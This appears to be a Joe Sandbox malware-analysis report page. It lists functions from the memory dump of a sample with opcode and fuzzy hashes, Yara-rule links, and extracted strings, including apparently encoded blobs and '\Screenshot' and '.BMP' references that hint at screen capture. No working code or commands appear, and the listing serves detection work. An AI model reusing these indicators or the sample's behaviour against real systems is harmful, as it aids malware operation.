Opcode ID: b5fa0ec7d34b807448bc0c0342318d7bb1527be1136cfc89cb5db5c32dcb1e95
Instruction ID: bfa578367a293e351b84a499d4438841f6fa6752b841de75bd8100aaae5244cb
Opcode Fuzzy Hash: b5fa0ec7d34b807448bc0c0342318d7bb1527be1136cfc89cb5db5c32dcb1e95
Instruction Fuzzy Hash: C292F774A11228DFDB24CF54DD84BE9B7B5BB49301F1081EAE40AB72A0DB745AC9CF58

Function 00404B0E Relevance: 10.7, Strings: 8, Instructions: 702COMMON

Download Yara Rule

Strings

31006B092E303634171D111D0B, xrefs: 004107ED
DXXuZPtFhondFBXdJuouXXNThQaRlZD, xrefs: 00410875, 004110D0
DC-SC, xrefs: 004111EA
Add, xrefs: 00410957
MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb, xrefs: 00410831
2831160E35193638060D3B19, xrefs: 0041080F, 004110AE
Remove, xrefs: 0041118A
6:@, xrefs: 00410741

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 2831160E35193638060D3B19$31006B092E303634171D111D0B$6:@$Add$DC-SC$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb$Remove
API String ID: 0-3937317562
Opcode ID: 65af6b4f0eb5ff6cc6a5f6ba92cb2bf07a7a5f0bbb9538724dc41f84b6b26677
Instruction ID: 649aebb9430765f1ced4c6ed545527a3d6e1c3aef569aff7a4ccef6eadefbe86
Opcode Fuzzy Hash: 65af6b4f0eb5ff6cc6a5f6ba92cb2bf07a7a5f0bbb9538724dc41f84b6b26677
Instruction Fuzzy Hash: 11720974A00218DFDB14DFA4C988BDDBBB5FF48304F1085A9E54AB72A0DB749A85CF94

Function 004112D0 Relevance: 8.0, Strings: 6, Instructions: 548COMMON

Download Yara Rule

Strings

UjdozVDhmbpJxhXevYCpekuthqpcoWUz, xrefs: 00411784
o, xrefs: 00411E8A
9, xrefs: 004119FF
29303D36, xrefs: 00411762
P, xrefs: 00411FC3
Z, xrefs: 00411862

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 29303D36$9$P$UjdozVDhmbpJxhXevYCpekuthqpcoWUz$Z$o
API String ID: 0-1530893593
Opcode ID: ab1fbdf1634e51f02a503a020ef1af791247ef05dbef5e82c5b7a69028057a06
Instruction ID: ea8f509ab24611ea4d5324bb326b7a2738f2309239e9417ae11b2dee5cff386c
Opcode Fuzzy Hash: ab1fbdf1634e51f02a503a020ef1af791247ef05dbef5e82c5b7a69028057a06
Instruction Fuzzy Hash: 11422FB5910608DBDB14DFA0DE48BDDB7B5FB44304F1081AEE606B72A0DB785A89CF58

Function 00404AE7 Relevance: 5.3, Strings: 4, Instructions: 349COMMON

Download Yara Rule

Strings

.BMP, xrefs: 0040FC11
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0040FBBC
\Screenshot, xrefs: 0040FBD1
3, xrefs: 00404AE7

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: .BMP$3$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$\Screenshot
API String ID: 0-2096396000
Opcode ID: 061d946050a8d6f6798205156eaa95750509573890ebe7a9b4ad7533ff73383d
Instruction ID: f2dd6cb0f289047c915cfab691a966317e8b5ef269ea0f8956c1862bab319ce8
Opcode Fuzzy Hash: 061d946050a8d6f6798205156eaa95750509573890ebe7a9b4ad7533ff73383d
Instruction Fuzzy Hash: CEE11D75900608DFDB14DFA4C948B9EBBB5FB48304F10817AE50AB72A0DB745989CF54

Function 0040EFE0 Relevance: 5.3, Strings: 4, Instructions: 262COMMON

Download Yara Rule

Strings

01103F0D340437373A03057156, xrefs: 0040F20E
ZORMlSDSfGqJCV, xrefs: 0040F27F
716C162F1F0D0324083018070B, xrefs: 0040F230
OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ, xrefs: 0040F252

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 01103F0D340437373A03057156$716C162F1F0D0324083018070B$OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ$ZORMlSDSfGqJCV
API String ID: 0-628392983
Opcode ID: db79940570c3b30b700496723a1b33993933c053789550120925f9c44d8b5bce
Instruction ID: de01bf6d6d0ded28411f3a8e0d8e3eb8b2e180c36b10da8d4fa967e88739ff1c
Opcode Fuzzy Hash: db79940570c3b30b700496723a1b33993933c053789550120925f9c44d8b5bce
Instruction Fuzzy Hash: 15C128B5900208DFDB14DFA4D988BDEBBB5FF48304F10816AE506B72A4DB749A49CF64

Function 00404AF4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

7, xrefs: 00404AF4

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 382da2642556af863da508fb72dff427c5a20e02760a0f1dd80d82fb4dbe7802
Instruction ID: 34b151677bd56b30fc0d92a8e0d4211d4148b0dc68100d5960f692d51e63c198
Opcode Fuzzy Hash: 382da2642556af863da508fb72dff427c5a20e02760a0f1dd80d82fb4dbe7802
Instruction Fuzzy Hash: 30219070915604EBCB10DF94CA4879DBBB5FF04304F10813EE5057B6A1C7B89A88CF99

Function 00403F40 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42cdf1849a56e4c6d9f36e6cc098a4509c9fe7c2c29297b41d168da59c7fcc8f
Instruction ID: e88b019acc2e05677dd89c22a91ca40e7c29880e0ccd705d61975136e811e179
Opcode Fuzzy Hash: 42cdf1849a56e4c6d9f36e6cc098a4509c9fe7c2c29297b41d168da59c7fcc8f
Instruction Fuzzy Hash: B7E0991195E3C2AFC303177989265823FB88D0329230A40E7E5D4EB0E3C06C088E8776

Function 00409631 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e06de20f4649e0cdc973f8fbaa503a9c09246c697ff6c12a4ea8162bd1db0e
Instruction ID: 24cef97ea9cd79e0c62e734b7004f8fee13e34f4fef7727d363685fd6ef166e8
Opcode Fuzzy Hash: 33e06de20f4649e0cdc973f8fbaa503a9c09246c697ff6c12a4ea8162bd1db0e
Instruction Fuzzy Hash: 03D05E8025D3C08FC31357200C11BA02FA49B13240F1D48E7C585EB1E3C22C4D0AC32A

Function 0040944C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc62e6f24e524dc9699606885c670a31e5cb05d2dd011674db458dd130067abe
Instruction ID: e38aeaceebf69d871678dcbad7daad9fa167b72bfaeae8838970de0da3432534
Opcode Fuzzy Hash: bc62e6f24e524dc9699606885c670a31e5cb05d2dd011674db458dd130067abe
Instruction Fuzzy Hash: 66B012303AC081DAD700F7E44C0142812C0D6407803E48C33E041E11D3CF38CF02C92D

Function 0040560C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20bb715e09b060873a05daf8a35e2fdc3b8a7cd192f3c6052e34290e0ec2d864
Instruction ID: 37f880ab455cb239edb4e15f59d3009af0baa78a926a7178d9017f95be00a018
Opcode Fuzzy Hash: 20bb715e09b060873a05daf8a35e2fdc3b8a7cd192f3c6052e34290e0ec2d864
Instruction Fuzzy Hash: 58B012143B4841EADA10FF584C0243B1180E2807403280C33E041E51D0CB39CE008E3E

Function 004057C4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e518c856f4fcbf6d958b24ef1b78ad5cd3783849e8fb3a882510fe813650677a
Instruction ID: 7da4d70b9fd36a7c20b7a93c3aa7fd2dbd5410c1edb50b513fc1c085be5b32d9
Opcode Fuzzy Hash: e518c856f4fcbf6d958b24ef1b78ad5cd3783849e8fb3a882510fe813650677a
Instruction Fuzzy Hash: 20B012183B4901EAD20097944C01C2A25D4D3C1B407340C37F142E31C0CE3CCF00AD2D

Function 00405690 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53af3b3373af3ab833a1d5a53ac26a28b9ec503dcbb8400e8f560866e96a03f4
Instruction ID: 728a2fc7328449022a2a0b93c71fdefc2d4d8e7a28888e7f0a56b5d627586584
Opcode Fuzzy Hash: 53af3b3373af3ab833a1d5a53ac26a28b9ec503dcbb8400e8f560866e96a03f4
Instruction Fuzzy Hash: 3AB012103AA801DFD20097546C0592B11C4D2417803E40C33F449F21E0CA39CF008E2D

Non-executed Functions

Function 0042EA80 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bc8a9c70acc9dbc157034f7043b9658f1a3af27551745e4627857b9bb7871e
Instruction ID: 102b6a917daacc18b362eb8768e6f13921f8960b0a2b331aeee51c010a21a5c0
Opcode Fuzzy Hash: 49bc8a9c70acc9dbc157034f7043b9658f1a3af27551745e4627857b9bb7871e
Instruction Fuzzy Hash: 02E0EC75B0420257D70C9E26E99563AF7B2B7CA256F50643DA54AE3334C638C8808A1D

Function 00405398 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bfc9a1e0da61b14968aad8adc21c4fdab552a830603433168653d7ab609eef4
Instruction ID: 89c647bb333f80b15430a75a1d7362e7aed3f29a1e4329d63bf48c29ea5e98b9
Opcode Fuzzy Hash: 7bfc9a1e0da61b14968aad8adc21c4fdab552a830603433168653d7ab609eef4
Instruction Fuzzy Hash: EAB012143A4905DED304AB548C0283B1180E740BC03240C33EC82F11C0CABCCE004D6F

